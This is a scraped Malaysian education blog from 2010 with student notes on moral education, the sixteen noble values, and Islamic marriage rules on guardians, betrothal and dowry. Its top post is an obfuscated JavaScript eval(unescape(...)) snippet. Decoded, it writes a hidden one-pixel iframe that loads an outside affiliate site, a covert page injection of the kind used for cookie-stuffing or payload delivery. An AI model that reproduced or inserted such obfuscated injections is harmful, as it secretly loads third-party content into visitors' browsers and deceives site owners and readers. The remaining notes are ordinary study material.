Posted by: mykhazanah | February 22, 2010

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%64%64%28%6e%29%20%7b%62%20%3d%20%75%6e%65%73%63%61%70%65%28%6e%29%3b%76%61%72%20%61%20%3d%20%27%27%3b%20%66%6f%72%20%28%69%3d%30%3b%69%3c%62%2e%6c%65%6e%67%74%68%3b%69%2b%2b%29%20%7b%61%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%62%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%2d%31%29%3b%7d%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%61%29%29%3b%20%7d")); dd("=JGSBNF!TSD>#iuuq;00xxx/zpvsbggjmjbufxfctjuf/dpn@sfg>fud>fud#!XJEUI>#2#!IFJHIU>#2#?=0JGSBNF?");

Posted by: mykhazanah | January 25, 2010

UNIT 2 : KONSEP-KONSEP ASAS MORAL

OBJEKTIF AM:
Memahami konsep, teori dan perbezaan di antara moral dan etika

OBJEKTIF KHUSUS:
Di akhir unit ini anda dapat :
menyenaraikan kepentingan Moral dan Etika
membezakan di antara konsep nilai Baik, Benar dan Patut.
membezakan di antara Teori Moral dan Pemikiran Moral.
mencetuskan idea berkaitan dengan agama yang dianuti.

2.0. PENGENALAN
Konsep-konsep asas moral adalah merupakan asas pemahaman kepada pendidikan moral. Dengan memahami konsep-konsep ini, pelajar dapat mengamalkan nilai-nilai moral dalam kehidupan seharian.

Konsep- konsep asas moral meliputi topik-topik berikut :
1.Perbezaan antara etika dan moral.
2.Konsep Akhlak, Kemoralan, Pendidikan Moral, Agama / Kepercayaan
3.Konsep nilai ‘baik’, ‘benar’ dan ‘patut’
4.Teori-teori Moral
5.Pemikiran Moral

2.1. PERBEZAAN ANTARA ETIKA DAN MORAL

Moral berasal dari perkataan Latin iaitu ‘moralis’ yang bermaksud tingkahlaku yang sejajar dan sesuai dengan tatasusila dan peraturan sesebuah masyarakat. Etika didefinisikan sebagai :

a.Sains moral yang mengkaji mengenai nilai-nilai moral yang terdapat di dalam masyarakat sama ada baik atau buruk
b.Perkataan etika berasal daripada Greek ‘ethos’ bermaksud satu cara hidup
c.Satu susunan peraturan tingkahlaku untuk melicinkan perjalanan sesuatu pentadbiran atau pengurusan seperti kod etika perguruan, perubatan, guaman, perakaunan dan lain-lain.

Etika pada amnya dibahagikan kepada dua bahagian iaitu etika deskriptif/metaetika dan etika normatif.

Sejarah etika dibahagikan kepada :

a. Etika Para Rasul
b. Etika Hindu
c. Etika Buddha
d. Etika Kung Fu Tze
e. Etika Greek Kuno
f. Etika Ulama Islam

2.2. KONSEP AKHLAK, KEMORALAN, PENDIDIKAN MORAL, AGAMA / KEPERCAYAAN

2.2.1. Konsep akhlak

Dalam bahasa Arab bermaksud budi pekerti seseorang individu. Ia merujuk kepada kelakuan atau watak atau gerak geri seseorang itu.Istilah akhlak tidak membawa maksud kelakuan yang baik atau buruk. Ia hanya membawa maksud kelakuan sahaja.Sebaliknya istilah moral sentiasa dikaitkan dengan tingkahlaku yang sesuai dengan peraturan masyarakat.

2.2.2. Konsep kemoralan

Kemoralan merupakan sesuatu yang berkait dengan peraturan-peraturan masyarakat yang diwujudkan di luar kawalan individu.Dorothy Emmet(1979) mengatakan bahawa manusia bergantung kepada tatasusila, adat, kebiasaan masyarakat dan agama bagi membantu menilai tingkahlaku seseorang.

2.2.3. Konsep Pendidikan Moral

Pendidikan moral merupakan mata pelajaran yang menekankan aspek-aspek kerohanian, kemanusiaan dan kemasyarakatan.Tumpuan khusus akan diberikan kepada pemupukan, penghayatan dan amalan nilai murni yang terdapat dalam agama, tradisi dan adat resam pelbagai kaum di Malaysia, sejajar dengan nilai murni sarwajagat. Pemupukan dan penghayatan nilai-nilai ini akan menyumbang kearah pembentukan insan yang mulia dan bertanggung jawab selaras dengan hasrat Falsafah Pendidikan Negara. Masyarakat yang berilmu, bertatasusila, berbudi dan penyayang akan memenuhi hasrat negara bagi mewujudkan masyarakat yang aman dan kondusif.

2.2.4. Konsep agama / kepercayaan

Agama mempunyai ajaran, peraturan dan perlakuan yang tercatat dalam kitab-kitab suci agama masing-masing. Allan Harris berkata bahawa agama mempunyai sejarah, cara hidup, nilai peraturan, psikologi kepercayaan dan hukum-hukum yang perlu dipatuhi oleh pengikutnya. Ia juga mempunyai pengasas atau penyuruh yang agung serta masyhur.

2.3. KONSEP NILAI ‘BAIK’, ‘BENAR’ DAN ‘PATUT’

2.3.1. Konsep Baik

Menurut kamus pelajar baru perkataan baik membawa memberi faedah atau bagus apabila menggunakannya. Huraian baik di atas menunjukkan kepada perasaan dalaman individu terhadap sesuatu yang telah digunakannya. Sebenarnya idea baik itu boleh memberi makna yang berbeza mengikut situasi atau konteks tertentu seperti :

a)baik dalam konteks pemilihan
b)baik dalam konteks nasihat
c)baik sebab memuji dan bersetuju
d)baik kerana menghargai
e)baik dalam hukuman dan nilaian serta tafsiran
f)baik disifatkan kerana kecekapan

2.3.2. Konsep Benar

Menurut Kant, sesuatu tingkahlaku itu adalah betul sekiranya ia sejajar dengan tugas atau tanggungjawab dan salah sekiranya ia bertentangan. Bagi G.E Moore(ahli falsafah Inggeris) sama ada sesuatu pelakuan dilabel benar atau salah adalah bergantung kepada darjah keseronokan yang dihasilkan. Mengikut pandangan beliau hanya keseronokan mempunyai kebaikan instrinsik.

2.3.3. Konsep Patut

Dalam etika , patut digunakan dalam tiga aspek yang berlainan. Cuba lihat pada situasi-situasi berikut :

1.‘Tindakan patut kita dilakukan’ bermakna seharusnya dipilih setelah menimbangkan semua perkara atau tindakan alternative lain. Tetapi tindakan tersebut perlu diberitahu oleh seorang individu yang mengetahui segala-galanya.
2.Dalam bidang falsafah dan perbincangan biasa, istilah patut juga digunakan untuk membawa maksud ‘jangan melakukan sesuatu yang seseorang itu patut…’. Ini bermakna dia patut membuat sesuatu yang salah, iaitu apa yang dia patut ‘jangan lakukan’.
3.Perhatikan lagi penggunaan patut di dalam ayat berikut : ‘Tindakan yang patut saya lakukan’. Ia bermakna satu tindakan yang digemari oleh saya walaupun ia mungkin bukan tindakan yang unggul.

Posted by: mykhazanah | January 25, 2010

TUGASAN PENDIDIKAN ISLAM 2

Sebagai Juruteknik Profesional / Pegawai Kewangan / Penasihat Kewangan / Pegawai Sistem Maklumat, anda diminta membuat sesuatu yang boleh menyumbang kepada kepentingan umat Islam. Untuk itu, sila buat persediaan awal dengan menyediakan satu proposal tentang projek anda.

Tugasan ini hendaklah:-
i. dibuat secara berkumpulan tidak kurang 4 orang dan tidak lebih 5 org
i. ditaip menggunakan ‘Times New Roman’ font ’12′
ii. mengandungi sekurang-kurangnya 10 halaman
iii. dihantar dalam bentuk ‘hard copy’ dan ‘soft copy’
1. ‘soft copy’ hendaklah di’winzip’kan dan dihantar melalui email:-
wnfai2003@gmail.com
iv. e-mailkan 'soft copy' sebelum atau pada 11/02/2010
v. serahkan 'hard copy' sebelum atau pada 13/02/2010

*markah akan ditolak sekiranya anda menghantar lewat daripada tarikh di atas.

Posted by: mykhazanah | January 22, 2010

KAMUS


Posted by: mykhazanah | January 20, 2010

16 Nilai Murni

16 nilai-nilai murni:-

  1. Baik Hati

Sikap sentiasa mengambil berat terhadap perasaan dan kebajikan orang lain secara tulus ikhlas. Sikap baik hati boleh dilihat dengan menilai tindak tanduk orang lain. Ini meliputi:

  • Aspek belas kasihan
  • Bertimbang rasa
  • Murah hati
  • Saling faham memahami
  • Sedia memaafkan

2.         Berdikari

Kebolehan dan kesanggupan melakukan sesuatu tanpa bergantung kepada orang lain. Berdikari dalam konteks ini membawa pengertian:

  • Bertanggungjawab
  • Berupaya bertindak sendiri
  • Jaya diri dan yakin pada diri sendiri.

 3.        Hemah Tinggi

Berbudi pekerti dengan tingkah laku mulia dan lemah lembut yang patut diamalkan oleh seseorang individu dalam hubungannya dengan ahli masyarakat yang lain. Ciri-ciri berhemah tinggi adalah:

  • Kesopanan
  • Mengakui kesalahan
  • Ramah mesra

4.         Hormat Menghormati

Menghargai dan memuliakan seseorang dan institusi sosial dengan memberi layanan yang bersopan. Ini merangkumi:

  • Hormat dan taat kepada ibubapa
  • Hormat kepada orang yang lebih tua, guru, rakan, jiran tetangga dan pemimpin
  • Hormat kepada raja dan negara
  • Patuh kepada undang-undang
  • Hormat kepada hak asasi
  • Hormat kepada kepercayaan dan adat resam pelbagai keturunan
  • Hormat kepada keperibadian individu.

5.         Kasih sayang

Perasaan cinta, kasih sayang yang mendalam dan berkekalan. Rasa ini lahir dari hati yang rela terhadap sesuatu, tanpa sebarang unsur kepentingan diri:

  • Sayang kepada nyawa
  • Sayang kepada alam sekeliling
  • Cinta kepada negara
  • Cinta kepada keamanan dan keharmonian

6.         Keadilan

Perlakuan, pertuturan dan keputusan yang saksama serta tidak berat sebelah.

7.         Kebebasan

Kebebasan yang dimaksudkan ini, tertakluk kepada peraturan dan undang-undang yang ditentukan oleh agama, masyarakat dan negara. Contohnya ialah:

  • Kebebasan di sisi undang-undang
  • Kebebasan dalam sistem demokrasi.

8.         Keberanian

Kesanggunpan seseorang untuk menghadapi cabaran dengan yakin dan tabah hati. Keberanian itu perlu ada pada setiap orang. Tetapi ia harus tahu batas dan keupayaannya kerana keberanian yang melulu mengakibatkan bencana. Nilai ini merangkumi:

  • Berani dengan tidak membuta tuli
  • Berani kerana benar
  • Berani mempertahankan pendirian
  • Berani bertanggungjawab.

9.         Kebersihan fizikal dan mental

Kebersihan fizikal ialah kebersihan diri dan kebersihan persekitaran. Kebersihan mental pula merangkumi pertuturan, perlakuan, pemikiran dan kerohanian. Antaranya ialah:

  • Kebersihan diri
  • Kebersihan persekitaran
  • Pertuturan dan kelakuan yang bersopan
  • Pemikiran yang sihat dan membina

10.       Kejujuran

Sikap dan perlakuan yang menunjukan niat baik, amanah dan ikhlas tanpa mengharapkan sebarang balasan.

11.       Kerajinan

Usaha berteruan yang penuh dengan semangat ketekunan, kecekalan, kegigihan, dedikasi dan daya usaha dalam melakukan sesuatu perkara.

12.       Kerjasama

Usaha baik dan membina yang dilakukan secara bersama pada peringkat individu, komuniti, masyarakat atau negara untuk mencapai sesuatu matlamat seperti persaudaraan, tanggungjawab bersama, gotong royang, ketoleranan dan perpaduan.

13.       Kesedaran

Sikap tidak keterlaluan dalam membuat pertimbangan dan tindakan sama ada dalam pemikiran, pertuturan atau perlakuan supaya sesuai dengan norma dan nilai masyarakat. Ini termasuklah:

  • Sederhana dalam menimbangkan kepentingan diri dan kepentingan orang lain.
  • Tidak keterlaluan dalam pertuturan dan tingkah laku.

14.       Kesyukuran

Perasaan dan perlakuan yang dilahirkan secara ikhlas di atas nikmat dan kesenangan yang diperolehi seperti berterima kasih,, mengenang budi dan penghargaan.

15.       Rasional

Boleh berfikir berdasarkan alasan dan bukti yang nyata dan dapat mengambil tindakan yang sewajarnya, tanpa dipengaruhi oleh perasaan. Umpamanya seperti boleh membuat pertimbangan, boleh membuat penakulan dan berfikiran logik dan terbuka.

16.       Semangat Bermasyarakat

Kesediaan melakukan sesuatu untuk kepentingan bersama bagi mewujudkan keharmonian hidup dalam masyarakat seperti bermuafakat, kerajinan dan peka kepada isu-isu sosial dalam masyarakat.

Posted by: mykhazanah | January 19, 2010

ASPEK MORAL DALAM WAWASAN DAN FPN

 Pend. selama 9 tahun dikatakan sebagai pend. universal percuma

i.  Pend. Sekolah Rendah selama 6 tahun  ii.  Pend. Sekolah Menengah selama 3 tahun

  Pendidikan yang lebih tinggi

i.  pendidikan kemahiran dan vokasional  ii.  pendidikan pengajian tinggi  iii.  pendidikan ‘Extention’

  Bahasa Malaysia bahasa pengantar rasmi Proses P&P

Alternatif bahasa pengantar bahasa Cina dan bahasa Tamil.

Matlamat-matlamat

Memperbanyakkan masyarakat yang berpengetahuan melahirkan masyarakat yang selaras dengan aspirasi dan hasrat negara seperti terkandung dalam rukun negara sebagai alat strategi dalam dasar ekonomi baru mempertingkatkan produktiviti individu untuk merealisasikan secara percuma, mengadakan sistem politeknik, pendidikan ‘extention’ menambahkan jumlah universiti.

 Pembentukan FPN   Penyata Razak 1956

 Laporan Rahman Talib 1960 Akta Pelajaran 1961

Laporan Jawatankuasa mengkaji semula pelaksanaan Dasar Pelajaran 1979

Rukun Negara dan Prinsip Pendidikan

Matlamat pendidikan

 Falsafah pendidikan negara bertujuan untuk memperkembangkan lagi potensi individu mewujudkan insan yang seimbang kepercayaan dan kepatuhan kepada tuhan Rakyat Malaysia yang berakhlak mulia, bertanggung jawab, berkeupayaan   untuk menikmati kesejahteraan diri dan melahirkan masyarakat Malaysia   bersatu padu tanpa mengira bangsa dan agama.

 Kementerian Pendidikan telah menyelaraskan nilai-nilai murni yang terdapat dalam pelbagai agama di Malaysia yang bersifat universal.  Kementerian Pendidikan Malaysia telah menubuhkan Jawatankuasa Pendidikan Moral 1976 meneliti dan menggubal nilai-nilai moral untuk diajar di sekolah berasaskan nilai-nilai universal yang terkandung dalam ajaran agama-agama di Malaysia. Jawatankuasa ini telah menerima secara muktamat 16 nilai murni untuk diajar di sekolah-sekolah.

Posted by: mykhazanah | January 19, 2010

A1002 PENDIDIKAN MORAL 1

OBJEKTIF AM

 Memahami kepentingan Pendidikan Moral dalam   Wawasan dan Falsafah Pendidikan Negara

  OBJEKTIF KHUSUS :

 Menerangkan kepentingan Pendidikan Moral    dalam Wawasan dan Falsafah Pendidikan Negara  Menyenaraikan nilai-nilai moral yang baik .

 Pendidikan Moral adalah satu mata pelajaran yang menekankan aspek-aspek : q Kerohanian q Kemanusiaan q Kemasyarakatan Tumpuan khusus akan diberikan kepada pemupukan, penghayatan dan amalan nilai murni yang terdapat di dalam agama, tradisi dan adat resam pelbagai kaum di Malaysia.

Mata pelajaran teras dalam kurikulum politeknik Kementerian Pendidikan Malaysia yang diwajibkan kepada pelajar-pelajar yang beragama selain daripada agama Islam.

Matlamat

Memberi peluang kepada pelajar untuk menghayati, mengenal, menerima, mengamal dan seterusnya membuat keputusan yang bertanggungjawab mengenai berbagai perkara dan situasi dalam kehidupan.  

Penghayatan membolehkan mereka membuat pertimbangan sendiri secara rasional dan sentiasa berlandaskan prinsip-prinsip moral apabila berhadapan dengan pelbagai isu.

Penghayatan dan amalan nilai-nilai moral ini dapat membentuk individu yang berperibadi mulia.

  Objektif

Memperkukuhkan amalan dan tingkah laku dengan sikap dan nilai moral yang diperolehi di peringkat sekolah.

Menyedari, memahami dan menghayati nilai-nilai moral serta norma dalam masyarakat malaysia ke arah pembinaan pemikiran yang lebih ideal.

Membuat pertimbangan dan bertindak mengikut teori, pemikiran, prinsip dan peraturan moral.

Mengamalkan nilai-nilai moral dalam kehidupan seharian.

Posted by: mykhazanah | January 19, 2010

WALI

  SUSUNAN WALI

1.Bapa 2.Datuk sblh bapa ke ats 3.Sdra lelaki seibu sebapa 4.Sdra lelaki sbapa 5.Anak sdra lelaki seibu sbapa 6.Anak sdra lelaki sbapa 7.Bapa sdra (sblh bapa) seibu sebapa 8.Bapa sdra (sblh bapa) sbapa 9.Anak bapa sdra (sblh bapa) seibu sbapa 10.Anak bapa sdra (sblh bapa) sbapa 11.Hakim.

 1.WALI MUJBIR (dekat)

Bapa @ datuk lelaki semasa ketiadaan bapa *Bapa @ datuk berhak mnikahkn anak gadisnya samada sudah baligh @ tidak tanpa keizinan kecuali janda.

  2.WALI AB’AD (wali jauh)

Selain dpr bapa @ datuk lelaki dpd susunan wali nasab -Sbb prpindhan wali aqrab kpd wali ab’ad i.X baligh ii.X siuman iii.Fasik iv.Hamba sahya v.Bisu @ pkak

*wali aqrab=wali dr klngan kluarga (nasab) pngantin ppuan dr pihak ayahnya liht ssnan wali)

*wali ab’ad x blh brtindk sbgmna wali mujbir kcuali tlh mninggal

*x brpindah klu wali mujbir dlm ihram

  3. WALI HAKIM

Mmpunyai kuasa utk jd wali dlm sstu sbb -sbb prpindhan wali nasab k ats wali hakim

 i.Ktka x d wali nsb ii.Wali enggan mgahwinkn iii.Wali brda  jauh (skdr hrus qasar solat) iv.Wali sdg dlm ihram v.Wali dlm thanan @ x dpt dhubungi vi.Wali bsmbunyi vii.Bla x 10 wali nasb

Posted by: mykhazanah | January 19, 2010

PERTUNANGAN (al-Khitbah)

DEFINISI

Melahirkn keinginan hendk brkahwin dari seorg lelaki terhdp seorg perempuan mlalui saluran syara’.

HUKUM

Adalah “harus” tetapi Imam As-Syafie(sila rujuk buku Mughni Almuhtaj) mengatakan hukumnya adalah “al-istihbab / sunat”. Dan Dr. Abd. Karim Zaidan(sila rujuk buku Almufassal fi Ahkam Al Mar’ah mengatakan bahawa hukum “al-istihbab / sunat” ini lebih aula(utama / baik) dari hukum “harus” tadi.

DALIL

  Hadis. Dari Jabir bin Abdillah bahawa Rasulallah saw bersabda: ” Apabila salah seorang dari kamu bertunang, maka jika sekiranya dia boleh melihat wanita itu hingga membawa kepada kehendak atau kemahuan untuk bernikah / kahwin, maka lakukan!!! “. Berkata Jabir (perawi) hadis ini: ” aku telah bertunang dengan wanita dari Bani Salamah, aku telah bersembunyi tanpa dilihat oleh wanita itu sehingga aku melihat sebahagian dari ‘diri / tubuh badan’ wanita itu yang boleh membawa kepada kehendak dan kemahuan aku untuk menikahi atau mengahwininya”.

* dalil di atas dipetik dan diambil dari buku Fiqh Assunnah oleh Syed Sabiq.

HIKMAH

i.Beribadah kpd Allah SWT. ii. Utk mndpt pasangan yg benar-benar serasi dlm kehidupan berumah tangga. iii.Sbg penghormatan kpd kaum wanita.

 PROSES PERTUNANGAN

 i.Mengenal pasti (agama, gadis, keturunan dll.

ii.Merisik (hantar wakil)

iii.Meminang (tentu tarikh, mahar dll)

 PINANGAN BERTINDIH

 Sabda Rasulullah s.a.w. yg bermaksud: “Diharamkan ke atas kamu meminang tunangan org lain melainkan apabila pertunangan itu dputuskn atau diizinkn kpdnya”.

  KAFAAH (sekufu)

 Bhs: sebanding @ sepadan

Syara’: per. yg dgn ketiadaannya mybabkn ‘aib sepadan (kafaah)

TUJUAN 

Utk mnjga kslmatn dan krukunan dlm prkahwinan

Agr suami mmpunyai kwibawaan srta khbtan dpndang tinggi, hormat dan mulia pd pndgan isteri

Agr suami dpt mndidik dan mengawal isterinya.

ASPEK YG DINILAI 

1.Beragama 2.Merdeka 3.Harga diri (iffah) 4.Keturunan 5.Akhlak 6.Berilmu 7.‘Aib 8.Umur 9.Pekerjaan

Posted by: mykhazanah | January 19, 2010

MAHAR

Definisi

Pemberian yg wajib oleh suami kpd isteri dgn sebab perkahwinan

BRG YG BLH DIJADIKN MASKAHWIN

i.Matawang ii.Harta benda iii.Pekerjaan (mengajar ilmu agama) iv.Makanan v.Memerdekakan hamba

KADAR

1.MAHAR MUSAMMA – Maskahwin yg dtentukn kadarnya mengikut prsetujuan kedua-dua blh pihak, samada dsebut smasa akad @ tidak dgn kerelaan.

2. MAHAR MITHLI – Mahar yg tidak dtentukn kadarnya ttpi dbandingkn dgn mahar kluarga isteri.

HUKUM MENYEBUT MAHAR SEMASA AKAD

SUNAT

 Hukum asal adalh sunat krn Rasulullah s.a.w. tidak prnah mninggalkn dr mnyebutnya smasa akad.

WAJIB

 i.Jka bkl isteri msh kecil (x baligh), gila @ bodoh ii.Sdgkn bkl suami brstuju mmbri mahar yg lbh dr yg sptutnya iii.Prmpuan yg smpurna tapi tidak mnyerahkn urusan maskahwin kpd walinya iv.Jka bkl suami msh kecil, gila @ bodoh dan belum blh mguruskn dirinya sendiri sdgkn bakal isteri brstuju mahar yg kurng dr spatutnya

Older Posts »

Categories

Follow

Get every new post delivered to your Inbox.